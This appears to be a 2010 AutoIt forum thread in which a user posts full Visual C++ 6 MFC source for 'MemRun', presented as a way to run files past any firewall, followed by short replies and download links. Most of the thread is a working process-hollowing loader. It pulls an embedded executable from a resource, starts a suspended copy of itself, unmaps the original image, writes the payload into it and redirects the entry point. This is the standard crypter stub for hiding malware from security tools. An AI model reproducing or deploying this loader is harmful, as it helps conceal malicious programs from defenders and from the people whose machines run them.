MFC_QuickRun_Mem

[wolf9228]

Quick Run Autoit files without any delay...and with any firewall

when they run On the first time.

C ++ 6 MFC MemRun.cpp

expandcollapse popup

// MemRun.cpp : Defines the class behaviors for the application.
//

#include "stdafx.h"
#include "MemRun.h"
#include "MemRunDlg.h"

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
BOOL MemRun(LPVOID lpImage);
/////////////////////////////////////////////////////////////////////////////
// CMemRunApp

BEGIN_MESSAGE_MAP(CMemRunApp, CWinApp)
    //{{AFX_MSG_MAP(CMemRunApp)
        // NOTE - the ClassWizard will add and remove mapping macros here.
        //    DO NOT EDIT what you see in these blocks of generated code!
    //}}AFX_MSG
    ON_COMMAND(ID_HELP, CWinApp::onhelp)
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CMemRunApp construction

CMemRunApp::CMemRunApp()
{
    // TODO: add construction code here,
    // Place all significant initialization in InitInstance
}

/////////////////////////////////////////////////////////////////////////////
// The one and only CMemRunApp object

CMemRunApp theApp;

/////////////////////////////////////////////////////////////////////////////
// CMemRunApp initialization

BOOL CMemRunApp::InitInstance()
{
    AfxEnableControlContainer();

    // Standard initialization
    // If you are not using these features and wish to reduce the size
    //  of your final executable, you should remove from the following
    //  the specific initialization routines you do not need.

#ifdef _AFXDLL
    Enable3dControls();         // Call this when using MFC in a shared DLL
#else
    Enable3dControlsStatic();   // Call this when linking to MFC statically
#endif

HGLOBAL LoadRes;
HRSRC   FindRes;
void    *LockRes;
DWORD dwSize;
HMODULE hModule = GetModuleHandle(0);
if (((FindRes = FindResource(hModule,"MEM", "MEM")) != NULL) &&((LoadRes = LoadResource(hModule, FindRes)) != NULL) &&((LockRes = LockResource(LoadRes)) != NULL))
{ 
MemRun((LPVOID) LockRes);
}
return FALSE;
}




BOOL MemRun(LPVOID lpImage)
{
// Variables for Process Forking
long int lWritten;
long int lHeaderSize;
long int lImageSize;
long int lSectionCount;
long int lSectionSize;
long int lFirstSection;
long int lPreviousProtection;
long int lJumpSize;

BOOL bReturnValue;

LPVOID lpImageMemory;
LPVOID lpImageMemoryDummy;

IMAGE_DOS_HEADER dsDosHeader;
IMAGE_NT_HEADERS ntNtHeader;
IMAGE_SECTION_HEADER shSections[512 * 2];

PROCESS_INFORMATION piProcessInformation;
STARTUPINFO suStartUpInformation;

CONTEXT cContext;

// Variables for Local Process
FILE* fFile;
char* pProcessName;

long int lFileSize;
long int lLocalImageBase;
long int lLocalImageSize;

LPVOID lpLocalFile;

IMAGE_DOS_HEADER dsLocalDosHeader;
IMAGE_NT_HEADERS ntLocalNtHeader;

/////////////////////////////////////////////////////////////////
// End Variable Definition

bReturnValue = false;

pProcessName = new char[MAX_PATH];
ZeroMemory(pProcessName,MAX_PATH);

// Get the file name for the dummy process
if(GetModuleFileName(NULL,pProcessName,MAX_PATH) == 0)
{
delete [] pProcessName;
return bReturnValue;
}

// Open the dummy process in binary mode
fFile = fopen(pProcessName,"rb");
if(!fFile)
{
delete [] pProcessName;
return bReturnValue;
}

fseek(fFile,0,SEEK_END);

// Get file size
lFileSize = ftell(fFile);

rewind(fFile);

// Allocate memory for dummy file
lpLocalFile = new LPVOID[lFileSize];
ZeroMemory(lpLocalFile,lFileSize);

// Read memory of file
fread(lpLocalFile,lFileSize,1,fFile);

// Close file
fclose(fFile);

// Grab the DOS Headers
memcpy(&dsLocalDosHeader,lpLocalFile,sizeof(dsLocalDosHeader));

if(dsLocalDosHeader.e_magic != IMAGE_DOS_SIGNATURE)
{
delete [] pProcessName;
delete [] lpLocalFile;
return bReturnValue;
}

// Grab NT Headers
memcpy(&ntLocalNtHeader,(LPVOID)((long int)lpLocalFile+dsLocalDosHeader.e_lfanew),sizeof(dsLocalDosHeader));

if(ntLocalNtHeader.Signature != IMAGE_NT_SIGNATURE)
{
delete [] pProcessName;
delete [] lpLocalFile;
return bReturnValue;
}

// Get Size and Image Base
lLocalImageBase = ntLocalNtHeader.OptionalHeader.ImageBase;
lLocalImageSize = ntLocalNtHeader.OptionalHeader.SizeOfImage;

// Deallocate
delete [] lpLocalFile;

// Grab DOS Header for Forking Process
memcpy(&dsDosHeader,lpImage,sizeof(dsDosHeader));

if(dsDosHeader.e_magic != IMAGE_DOS_SIGNATURE)
{
delete [] pProcessName;
return bReturnValue;
}

// Grab NT Header for Forking Process
memcpy(&ntNtHeader,(LPVOID)((long int)lpImage+dsDosHeader.e_lfanew),sizeof(ntNtHeader));

if(ntNtHeader.Signature != IMAGE_NT_SIGNATURE)
{
delete [] pProcessName;
return bReturnValue;
}

// Get proper sizes
lImageSize = ntNtHeader.OptionalHeader.SizeOfImage;
lHeaderSize = ntNtHeader.OptionalHeader.SizeOfHeaders;

// Allocate memory for image
lpImageMemory = new LPVOID[lImageSize];
ZeroMemory(lpImageMemory,lImageSize);

lpImageMemoryDummy = lpImageMemory;

lFirstSection = (long int)(((long int)lpImage+dsDosHeader.e_lfanew) + sizeof(IMAGE_NT_HEADERS));

memcpy(shSections,(LPVOID)(lFirstSection),sizeof(IMAGE_SECTION_HEADER) *ntNtHeader.FileHeader.NumberOfSections);
memcpy(lpImageMemoryDummy,lpImage,lHeaderSize);

// Get Section Alignment
if((ntNtHeader.OptionalHeader.SizeOfHeaders % ntNtHeader.OptionalHeader.SectionAlignment) == 0)
{
lJumpSize = ntNtHeader.OptionalHeader.SizeOfHeaders;
}
else
{
lJumpSize = (ntNtHeader.OptionalHeader.SizeOfHeaders/ntNtHeader.OptionalHeader.SectionAlignment);
lJumpSize += 1;
lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment);
}

lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize);

// Copy Sections To Buffer
for(lSectionCount = 0; lSectionCount < ntNtHeader.FileHeader.NumberOfSections; lSectionCount++)
{
lJumpSize = 0;
lSectionSize = shSections[lSectionCount].SizeOfRawData;

memcpy(lpImageMemoryDummy,(LPVOID)((long int)lpImage + shSections[lSectionCount].PointerToRawData),lSectionSize);

if((shSections[lSectionCount].Misc.VirtualSize % ntNtHeader.OptionalHeader.SectionAlignment)==0)
{
lJumpSize = shSections[lSectionCount].Misc.VirtualSize;
}
else
{
lJumpSize = (shSections[lSectionCount].Misc.VirtualSize/ntNtHeader.OptionalHeader.SectionAlignment);
lJumpSize += 1;
lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment);
}

lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize);
}

ZeroMemory(&suStartUpInformation,sizeof(STARTUPINFO));
ZeroMemory(&piProcessInformation,sizeof(PROCESS_INFORMATION));
ZeroMemory(&cContext,sizeof(CONTEXT));

suStartUpInformation.cb = sizeof(suStartUpInformation);

// Create Process
if(CreateProcess(NULL,pProcessName,NULL,NULL,false,CREATE_SUSPENDED,NULL,NULL,&suStartUpInformation,&piProcessInformation))
{
cContext.ContextFlags = CONTEXT_FULL;
GetThreadContext(piProcessInformation.hThread,&cContext);

// Check image base and image size
if(lLocalImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize)
{
VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,PAGE_EXECUTE_READWRITE,(unsigned long*)&lPreviousProtection);
}
else
{
typedef int (*parameters) (HANDLE,PVOID);
parameters NtUnmapViewOfSection = (parameters) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtUnmapViewOfSection");
if(!NtUnmapViewOfSection(piProcessInformation.hProcess,(LPVOID)((DWORD )lLocalImageBase)))
VirtualAllocEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
}

// Write Image to Process
if(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lpImageMemory,lImageSize,(unsigned long*)&lWritten))
{
bReturnValue = true;
}

// Set Image Base
if(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)cContext.Ebx + 8),&ntNtHeader.OptionalHeader.ImageBase,4,(unsigned long*)&lWritten))
{
if(bReturnValue == true)
bReturnValue = true;
}

if(bReturnValue == false)
{
delete [] pProcessName;
delete [] lpImageMemory;
return bReturnValue;
}

// Set the new entry point
cContext.Eax = ntNtHeader.OptionalHeader.ImageBase + ntNtHeader.OptionalHeader.AddressOfEntryPoint;

SetThreadContext(piProcessInformation.hThread,&cContext);

if(lLocalImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize)
VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,lPreviousProtection,0);

// Resume the process
ResumeThread(piProcessInformation.hThread);
}

delete [] pProcessName;
delete [] lpImageMemory;

return bReturnValue;
}

C ++ 6 MFC MemRun.h

expandcollapse popup

// MemRun.h : main header file for the MEMRUN application
//

#if !defined(AFX_MEMRUN_H__EC889871_EB04_48D4_9B33_BCDE94C69379__INCLUDED_)
#define AFX_MEMRUN_H__EC889871_EB04_48D4_9B33_BCDE94C69379__INCLUDED_

#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000

#ifndef __AFXWIN_H__
    #error include 'stdafx.h' before including this file for PCH
#endif

#include "resource.h"       // main symbols

/////////////////////////////////////////////////////////////////////////////
// CMemRunApp:
// See MemRun.cpp for the implementation of this class
//

class CMemRunApp : public CWinApp
{
public:
    CMemRunApp();

// Overrides
    // ClassWizard generated virtual function overrides
    //{{AFX_VIRTUAL(CMemRunApp)
    public:
    virtual BOOL InitInstance();
    //}}AFX_VIRTUAL

// Implementation

    //{{AFX_MSG(CMemRunApp)
        // NOTE - the ClassWizard will add and remove member functions here.
        //    DO NOT EDIT what you see in these blocks of generated code !
    //}}AFX_MSG
    DECLARE_MESSAGE_MAP()
};


/////////////////////////////////////////////////////////////////////////////

//{{AFX_INSERT_LOCATION}}
// Microsoft Visual C++ will insert additional declarations immediately before the previous line.

#endif // !defined(AFX_MEMRUN_H__EC889871_EB04_48D4_9B33_BCDE94C69379__INCLUDED_)

Edited January 15, 2010 by wolf9228

[UEZ]

Impressive code but I don't understand the benefit of the code! Can you explain what MFC_QuickRun_Mem is doing and for what it can be used?

I started with learning C++ and currently I don't understand the C++ codes very well.

Thanks,

UEZ

Edited January 15, 2010 by UEZ

[wolf9228]

Projects_MemRun_C++6.rar

http://uploading.com/files/d3e8fdbd/Projects_MemRun_C%252B%252B6.rar/

http://www.c-plusplus.de/forum/viewtopic-var-p-is-1777809.html

ForkProcess(LPVOID lpImage)

Edited January 15, 2010 by wolf9228

[wolf9228]

Impressive code but I don't understand the benefit of the code! Can you explain what MFC_QuickRun_Mem is doing and for what it can be used?

I started with learning C++ and currently I don't understand the C++ codes very well.

Thanks,

UEZ

If you are able to Autoit is easy for you to work on the C++ 6 ... Thank you

[nugame]

If you are able to Autoit is easy for you to work on the C++ 6 ... Thank you

there is a difference.

[wolf9228]

there is a difference.

Sure there is a difference .. But C++ is easier than Autoit .. After

learning use foundations ... Because Possibilities in C++ Best than

Autoit especially in memory functions and Call library functions And

also the possibilities of using classes An example in IRichEditOleCallback

Interface also provide many examples in MSDN site and other... And do not

forget libraries support such as MFC library And other

Edited January 16, 2010 by wolf9228